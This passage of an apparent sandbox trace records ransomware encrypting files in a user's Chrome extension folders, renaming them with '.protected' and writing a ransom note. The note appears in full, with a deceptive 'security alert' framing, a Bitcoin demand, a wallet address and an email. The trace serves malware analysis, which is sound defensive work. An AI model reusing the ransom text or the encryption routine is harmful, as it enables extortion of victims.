(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json") returned 155 [0080.429] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.430] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xcc, lpOverlapped=0x0) returned 1 [0080.431] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.431] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xcc, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xcc, lpOverlapped=0x0) returned 1 [0080.431] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.431] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.431] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.431] CloseHandle (hObject=0x168) returned 1 [0080.431] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.protected") returned 165 [0080.431] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.protected")) returned 1 [0080.432] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.432] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.432] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\RESTORE_FILES.txt") returned 159 [0080.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.433] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.433] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.434] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.434] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.434] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.434] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.434] CloseHandle (hObject=0x164) returned 1 [0080.434] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.434] lstrcmpiW (lpString1="es_419", lpString2="Windows") returned -1 [0080.434] lstrcmpiW (lpString1="es_419", lpString2="Program Files") returned -1 [0080.434] lstrcmpiW (lpString1="es_419", lpString2="Program Files (x86)") returned -1 [0080.434] lstrcmpiW (lpString1="es_419", lpString2="$Recycle.bin") returned 1 [0080.434] lstrcmpiW (lpString1="es_419", lpString2="System Volume Information") returned -1 [0080.435] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419") returned 145 [0080.435] lstrcmpW (lpString1="es_419", lpString2=".") returned 1 [0080.435] lstrcmpW (lpString1="es_419", lpString2="..") returned 1 [0080.435] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\*") returned 147 [0080.435] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.436] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.436] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.436] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.436] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.436] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.436] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\.") returned 147 [0080.436] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.436] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.436] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.436] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.436] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.436] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.436] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.436] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\..") returned 148 [0080.436] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.436] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.436] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.436] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.436] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.436] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.436] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.436] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.437] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json") returned 159 [0080.437] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.437] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.437] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.437] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.437] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json") returned 159 [0080.437] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.437] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json") returned 159 [0080.437] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.437] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json") returned 159 [0080.437] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.437] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0080.438] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.439] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0080.439] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.439] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.439] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.439] CloseHandle (hObject=0x168) returned 1 [0080.439] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.protected") returned 169 [0080.439] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.protected")) returned 1 [0080.440] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.440] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.440] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\RESTORE_FILES.txt") returned 163 [0080.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.441] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.441] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.442] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.442] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.442] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.442] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.442] CloseHandle (hObject=0x164) returned 1 [0080.442] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.442] lstrcmpiW (lpString1="et", lpString2="Windows") returned -1 [0080.442] lstrcmpiW (lpString1="et", lpString2="Program Files") returned -1 [0080.442] lstrcmpiW (lpString1="et", lpString2="Program Files (x86)") returned -1 [0080.442] lstrcmpiW (lpString1="et", lpString2="$Recycle.bin") returned 1 [0080.442] lstrcmpiW (lpString1="et", lpString2="System Volume Information") returned -1 [0080.442] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et") returned 141 [0080.442] lstrcmpW (lpString1="et", lpString2=".") returned 1 [0080.442] lstrcmpW (lpString1="et", lpString2="..") returned 1 [0080.442] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\*") returned 143 [0080.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.443] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.443] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.443] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.443] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.443] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.443] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\.") returned 143 [0080.443] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.443] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.443] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.443] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.443] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.443] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.443] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.443] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\..") returned 144 [0080.443] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.443] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.443] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.443] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.443] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.443] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.443] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.443] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.443] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json") returned 155 [0080.444] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.444] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.444] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.444] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json") returned 155 [0080.444] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json") returned 155 [0080.444] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json") returned 155 [0080.444] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.444] ReadFile (in: 